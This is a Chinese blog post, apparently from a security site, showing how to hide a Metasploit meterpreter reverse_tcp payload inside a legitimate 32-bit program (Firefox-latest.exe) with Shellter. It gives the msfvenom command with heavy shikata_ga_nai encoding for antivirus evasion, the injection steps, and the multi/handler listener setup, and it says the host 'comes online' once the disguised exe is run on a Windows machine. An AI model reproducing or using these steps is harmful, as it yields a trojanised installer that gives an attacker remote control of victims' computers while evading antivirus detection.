关注我们

使用Metasploit&Shellter 捆绑免杀

网友投稿网友投稿 安全文摘 2018-06-29 916166 0

Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用

Shellter

Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用程序(仅限于32位应用程序)。shellcode也可以通过Metasploit生成的payload免杀。

准备

  • 使用kali linux

  • 安装 shellter
    apt install shellter
    或者 官网下载

1.使用Metasploit生成 payload

使用Metasploit&Shellter 捆绑免杀

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw

2.使用Shellter选择捆绑exe文件

  • 目录下放置一个32位的exe程序,我以Firefox-latest.exe 为例

使用Metasploit&Shellter 捆绑免杀

3.把 fud.raw 注入到exe程序

使用Metasploit&Shellter 捆绑免杀

4.启动Metasploit监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1337
exploit

* 启动监听之后,把目录下的 Firefox-latest.exe 文件放置 windows 电脑下运行即可主机上线

  • 杀毒引擎扫描结果
    使用Metasploit&Shellter 捆绑免杀

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢2发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址